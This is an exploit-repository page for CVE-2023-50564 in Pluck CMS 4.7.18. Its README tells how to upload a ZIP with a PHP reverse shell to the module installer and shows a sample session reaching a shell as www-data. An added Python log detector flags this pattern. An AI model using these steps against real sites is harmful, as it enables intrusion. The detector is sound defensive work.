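PoC details: e9bf5d43bda76c6baba6e31a5eeed0a8db2feb31

Source
Related vulnerability
Title: Pluck security vulnerability (CVE-2023-50564)
Description: Pluck is a content management system (CMS) written in PHP. Pluck v4.7.18 contains a security vulnerability: an arbitrary file upload flaw in the component /inc/modules_install.php allows an attacker to execute arbitrary code by uploading a crafted ZIP file.
Introduction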
# CVE-2023-50564 - Pluck CMS v4.7.18 Exploit

## Overview

This script exploits an authenticated arbitrary file upload vulnerability in **Pluck CMS v4.7.18** (CVE-2023-50564). By leveraging this vulnerability, an authenticated attacker can upload a malicious PHP file, enabling the execution of arbitrary code (in this case, a reverse shell).

### Exploit Details

- **CVE ID**: CVE-2023-50564
- **Affected Version**: Pluck CMS v4.7.18
- **Type**: Authenticated Arbitrary File Upload
- **Impact**: Remote Code Execution (RCE)

The vulnerability exists in the `/admin.php?action=installmodule` endpoint, which allows an authenticated user to upload a ZIP file containing arbitrary files. By uploading a malicious PHP file, this exploit establishes a reverse shell back to the attacker.

## Requirements

- **Python 3.x**
- **requests** module: `pip install requests`
- **requests-toolbelt** module: `pip install requests-toolbelt`

The script also needs the target's URL and a valid password for the Pluck CMS instance.

## Exploit Features

- **Reverse Shell**: The exploit uploads a PHP reverse shell to the target and connects back to the attacker's machine.
- **Interactive Command Execution**: Once the reverse shell is established, commands can be executed interactively on the target.
- **Password Prompt Detection**: The exploit detects password prompts (e.g., `su`, `sudo -l`) and allows the user to provide input manually.

## Usage

### Steps to Run the Exploit

1. **Clone the Repository**:
   ```bash
   git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
   cd Pluck-CMS-Exploit
   ```
2. **Install Required Python Packages**: Make sure the required packages are installed:
   ```bash
   pip install requests requests-toolbelt
   ```
3. **Run the Exploit**: The script requires four inputs: target URL, the CMS password, your IP address (for the reverse shell), and the port on which you want to listen. Run the exploit using Python:
   ```bash
   python3 exploit.py
   ```
4. **Provide Input When Prompted**:
   - Enter the target URL (e.g., example.com).
   - Enter the password for authentication on the CMS.
   - Enter your IP address for the reverse shell connection.
   - Enter the port for listening to the reverse shell.
5. **Interactive Shell**: Once the reverse shell is established, you'll be presented with a `Shell>` prompt to interact with the target system.

**Example:**

   ```bash
    $ python3 exploit.py
    Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
    Enter the password for target authentication: password123
    Enter your IP (for reverse shell): 10.10.14.5
    Enter the port to listen on (for reverse shell): 4444
    [*] Authenticating to the target...
    [+] Authentication successful.
    [*] Generating reverse shell PHP file...
    [+] Reverse shell PHP file created successfully as 'shell.php'.
    [*] Creating ZIP payload...
    [+] ZIP file created as 'payload.zip'.
    [*] Starting reverse shell listener on 10.10.14.5:4444 ...
    [*] Uploading payload to the target...
    [+] Payload uploaded successfully.
    [*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
    [+] Connection received from ('10.10.10.1', 55678)
    Shell> whoami
    www-data
   ```

## Exploit Breakdown

- **Authentication**: The script logs into the CMS using the provided credentials.
- **File Upload**: It creates a ZIP archive containing a PHP reverse shell and uploads it to the vulnerable endpoint (`/admin.php?action=installmodule`).
- **Reverse Shell**: The script triggers the uploaded PHP file, establishing a reverse shell connection back to the attacker's machine.
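
Seen from the defending side, the sequence above shows up in web server access logs as a POST to `/admin.php?action=installmodule` followed by a request for a `.php` file under `/data/modules/`. The following is an added example, not part of the original repository: it assumes combined-format access logs in chronological order, and the function names and sample log lines are constructed for illustration.

```python
import re

# Combined-log-format fields needed: client IP, method, request path, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Direct request for a .php file inside a module directory.
MODULE_PHP_RE = re.compile(r'/data/modules/(?P<module>[^/?]+)/[^?]*\.php(?:\?|$)', re.I)

# Constructed sample log (documentation IP ranges), in chronological order.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /admin.php HTTP/1.1" 200 3100
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "POST /admin.php?action=installmodule HTTP/1.1" 200 5120
198.51.100.20 - - [01/Jan/2024:10:00:06 +0000] "GET / HTTP/1.1" 200 2048
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /data/modules/payload/shell.php HTTP/1.1" 200 0
198.51.100.20 - - [01/Jan/2024:10:00:12 +0000] "GET /data/modules/example/example.php HTTP/1.1" 403 199
""".splitlines()

def is_install_upload(method, path):
    """True for a POST to the module installer endpoint named on this page."""
    base, _, query = path.partition("?")
    return (method == "POST" and base.endswith("/admin.php")
            and "action=installmodule" in query.split("&"))

def find_module_install_abuse(lines):
    """Flag clients that POST to installmodule and later request module PHP."""
    last_upload = {}  # client IP -> line number of its most recent upload
    alerts = []
    for lineno, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, method, path = m["ip"], m["method"], m["path"]
        if is_install_upload(method, path):
            last_upload[ip] = lineno
            continue
        hit = MODULE_PHP_RE.search(path)
        if hit and ip in last_upload:
            alerts.append({"ip": ip, "upload_line": last_upload[ip],
                           "request_line": lineno, "module": hit["module"],
                           "path": path, "status": int(m["status"])})
    return alerts

if __name__ == "__main__":
    for alert in find_module_install_abuse(SAMPLE_LOG):
        print(alert)
```

Matching by client IP keeps the example short; a stricter rule raises any direct `.php` request under `/data/modules/` for triage.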

## CVE Details

- **CVE ID**: CVE-2023-50564
- **Vulnerable Endpoint**: `/admin.php?action=installmodule`
- **Vulnerable Version**: Pluck CMS v4.7.18
- **Type**: Authenticated Arbitrary File Upload

## Disclaimer

This script is intended for educational purposes and ethical hacking. It should only be used in environments where you have explicit permission to test. The author is not responsible for any misuse of this tool.

## License

This project is licensed under the MIT License - see [MIT License](https://opensource.org/licenses/MIT) for details.

## Contributing

Feel free to fork the repository and submit pull requests. For any issues or feature requests, please open an issue on GitHub.
File snapshot

```
[4.0K] /data/pocs/e9bf5d43bda76c6baba6e31a5eeed0a8db2feb31
├── [7.9K] exploit.py
└── [4.3K] README.md

0 directories, 2 files
```